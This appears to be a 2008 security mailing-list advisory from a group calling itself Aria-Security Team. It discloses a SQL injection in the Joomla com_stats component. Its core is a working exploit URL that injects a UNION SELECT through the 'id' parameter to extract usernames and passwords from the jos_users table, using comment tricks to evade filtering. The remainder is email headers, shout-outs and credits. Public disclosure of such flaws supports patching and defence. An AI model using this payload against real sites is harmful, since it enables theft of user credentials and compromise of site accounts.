Joomla com_stat "id" Remote SQL Injection
Date: 24 Feb 2008 01:19:34 -0000
From: [email protected]
To: [email protected]
Subject: Joomla com_stat "id" Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N,
Joomla com_stat "id" Remote SQL Injection
index.php?option=com_stats&opt=viewteam&id=-100101110000/**/union/**/select/**/username,password,3,4,5,6,7,8/**/from/**/jos_users/*
(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1465)
AurA
Aria-Security Team
(Credits to Aria-Security Team)
